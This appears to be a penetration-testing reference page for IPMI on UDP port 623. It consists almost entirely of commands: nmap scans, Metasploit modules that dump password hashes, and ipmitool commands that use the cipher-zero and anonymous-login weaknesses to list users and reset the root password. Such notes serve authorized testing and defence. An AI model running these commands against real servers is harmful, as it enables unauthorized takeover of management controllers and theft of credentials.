# 623 - IPMI

## Nmap

{% code overflow="wrap" %}

```bash
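# IPMI listens on UDP 623, so the version script needs a UDP scan (-sU)
nmap -sU -sV -p 623 IP --script=ipmi-version
# plain UDP port check without DNS resolution
nmap -n -sU -p 623 IP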
```

{% endcode %}

## Metasploit

```
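# identify the IPMI version
use auxiliary/scanner/ipmi/ipmi_version
# check whether cipher suite 0 is accepted
use auxiliary/scanner/ipmi/ipmi_cipher_zero
# retrieve IPMI 2.0 RAKP password hashes
use auxiliary/scanner/ipmi/ipmi_dumphashes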
```

## Testing

### ipmitool

```
apt-get install ipmitool
# -C 0 selects cipher suite 0
ipmitool -I lanplus -C 0 -H IP -U root -P root user list

# change the password of the root user (user ID 2) to passw
ipmitool -I lanplus -C 0 -H IP -U root -P root user set password 2 passw
```

### Anonymous authentication

```
ipmitool -I lanplus -H IP -U '' -P '' user list

# change the password of the root user (user ID 2) to passw2
ipmitool -I lanplus -H IP -U '' -P '' user set password 2 passw2
```

